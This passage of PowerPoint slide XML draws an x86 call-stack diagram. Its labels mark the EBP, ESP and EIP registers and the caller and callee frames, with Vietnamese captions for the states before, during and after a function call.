              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1D630C-664E-0E96-C08E-D62432DFC378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2731505947"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3909081" y="3333635"/>
          <a:ext cx="1816500" cy="2346680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1816500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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CE5CD"/>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9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:lnTlToBr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnTlToBr>
                    <a:lnBlToTr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="FCE5CD"/>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600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>caller</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> code</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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5"/>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600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>callee</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> code</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="45" name="Google Shape;207;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6048A5E1-148F-7230-B842-B4605952EAB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2767733397"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6881606" y="3333635"/>
          <a:ext cx="1816500" cy="2346680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1816500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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4CCCC"/>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9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>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sz="16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600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>caller</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> code</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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5"/>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600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>callee</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> code</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Google Shape;208;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D79BB18-6508-0C3C-F04B-3CF8EAC8A816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="42512" y="3276600"/>
            <a:ext cx="3002983" cy="2940063"/>
            <a:chOff x="81859" y="2661350"/>
            <a:chExt cx="3002983" cy="2940063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="47" name="Google Shape;209;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{561E8193-630F-5382-012C-1C888D3FAFD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="702877" y="2852950"/>
              <a:ext cx="254700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Google Shape;210;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD316F3-D671-C7E1-21B9-E6AAFAC41C66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="81859" y="2661350"/>
              <a:ext cx="3002983" cy="2940063"/>
              <a:chOff x="81859" y="2661350"/>
              <a:chExt cx="3002983" cy="2940063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Google Shape;211;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68ACDD59-B557-0BB1-49C1-F66BE1B139CD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="81859" y="2661350"/>
                <a:ext cx="676975"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EBP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50" name="Google Shape;212;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA36247-1A19-590B-ECDB-C23FFA4C84A7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20735770">
                <a:off x="949483" y="2751045"/>
                <a:ext cx="1825894" cy="461635"/>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Caller frame</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51" name="Google Shape;213;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9ED1B62-1806-4D94-000C-47660E642535}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="81859" y="2969321"/>
                <a:ext cx="676975"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ESP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52" name="Google Shape;214;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E45373-94DB-B95E-DE27-F98B68ADF249}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="702877" y="3160919"/>
                <a:ext cx="254700" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Google Shape;215;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE3E74B-454C-00C0-5C1C-40190ACD3751}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="946203" y="4862780"/>
                <a:ext cx="1874400" cy="738633"/>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Trước khi gọi hàm</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54" name="Google Shape;216;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFAD5D1-DCA6-2E6D-F482-4B61A3486C2A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="81859" y="4188521"/>
                <a:ext cx="676975"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EIP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55" name="Google Shape;217;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D256851-777E-1D2B-5575-6B95CE3C383A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="702877" y="4380110"/>
                <a:ext cx="254700" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="Google Shape;218;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54F4393-1615-0A4E-0AF7-0501D2ED1D7F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2483703" y="3054012"/>
                <a:ext cx="802200"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Stack</a:t>
                </a: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57" name="Google Shape;219;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F033AF55-283B-774B-A8AE-6A1A1C2BF937}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2530768" y="4415526"/>
                <a:ext cx="708069"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Code</a:t>
                </a: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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Google Shape;220;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90B84403-FD75-B4C1-9610-92F9A30A1FD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3022408" y="3455570"/>
            <a:ext cx="2996375" cy="2894784"/>
            <a:chOff x="3061755" y="2840320"/>
            <a:chExt cx="2996375" cy="2894784"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Google Shape;221;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEE9DE94-A60E-5E0B-E91E-845874FE19EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3061760" y="3426521"/>
              <a:ext cx="614393"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EBP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60" name="Google Shape;222;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F04847-994D-B4B7-5330-D16E3AB10974}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3676158" y="3595861"/>
              <a:ext cx="254700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Google Shape;223;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2712CB73-F9CF-7D7C-E118-A721860DD4D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3061755" y="3731321"/>
              <a:ext cx="614398"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ESP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62" name="Google Shape;224;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7218B4C-BC44-B471-3404-86A194998EAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3676158" y="3900661"/>
              <a:ext cx="254700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Google Shape;225;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F57FE69-BC84-AC7F-29EA-5D0452B6E6E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3828213" y="4996471"/>
              <a:ext cx="2115580" cy="738633"/>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Trong khi hàm được gọi thực thi</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64" name="Google Shape;226;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99B8A6C5-F44D-4165-7082-5997F5365039}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20735770">
              <a:off x="3937233" y="2840320"/>
              <a:ext cx="1825894" cy="461635"/>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Caller frame</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65" name="Google Shape;227;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54CEDDAF-8897-681E-2B02-356D18A776BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20735770">
              <a:off x="3937233" y="3449920"/>
              <a:ext cx="1825894" cy="461635"/>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Callee frame</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66" name="Google Shape;228;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7653C9-B409-D580-B3A4-65694C15B72E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3195253" y="4721921"/>
              <a:ext cx="480900"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EIP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67" name="Google Shape;229;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAF57189-0DE2-634D-9FAB-3A1258B6132E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3676158" y="4891260"/>
              <a:ext cx="254700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Google Shape;230;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9520CA7-12FA-3EDC-70E4-907C4F0BAAE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5456991" y="3054012"/>
              <a:ext cx="802200"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Stack</a:t>
              </a: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69" name="Google Shape;231;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8169A0-9877-39C4-778C-350BE4A2FFE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5504056" y="4491726"/>
              <a:ext cx="708069"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Code</a:t>
              </a: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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70" name="Google Shape;232;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19535AD6-B52A-9CB9-00F2-820D001A2222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6050090" y="3298850"/>
            <a:ext cx="2942005" cy="3030165"/>
            <a:chOff x="6089437" y="2683600"/>
            <a:chExt cx="2942005" cy="3030165"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Google Shape;233;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B88A324C-0B49-7A57-A551-B499E26BE310}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20735770">
              <a:off x="6895283" y="2764120"/>
              <a:ext cx="1825894" cy="461635"/>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Caller frame</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72" name="Google Shape;234;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339B4709-2596-0CC4-4124-E483B416F325}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6927947" y="4975132"/>
              <a:ext cx="1874400" cy="738633"/>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Sau khi hàm được gọi trả về</a:t>
              </a:r>
              <a:endParaRPr kumimoji="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73" name="Google Shape;235;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39CD8C74-F588-7F5A-85E6-49D907C82C00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6089438" y="2683600"/>
              <a:ext cx="560015"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EBP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74" name="Google Shape;236;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1E4658-F896-DC6F-B43D-0FDC3F522C15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6649452" y="2852950"/>
              <a:ext cx="254700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Google Shape;237;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD5F890-279B-B288-F2BE-AB9924E68B70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6089437" y="3045521"/>
              <a:ext cx="560016"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ESP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76" name="Google Shape;238;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4B8E9C0-DD51-1517-5DC1-324D616D121C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6649452" y="3214869"/>
              <a:ext cx="254700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Google Shape;239;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2547C846-4C90-FE59-5934-8D06E721BBDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6168553" y="4340921"/>
              <a:ext cx="480900"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EIP</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0"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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="78" name="Google Shape;240;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EAD4D69-919B-6FF1-4B77-771EA7A5E262}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6649452" y="4510260"/>
              <a:ext cx="254700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
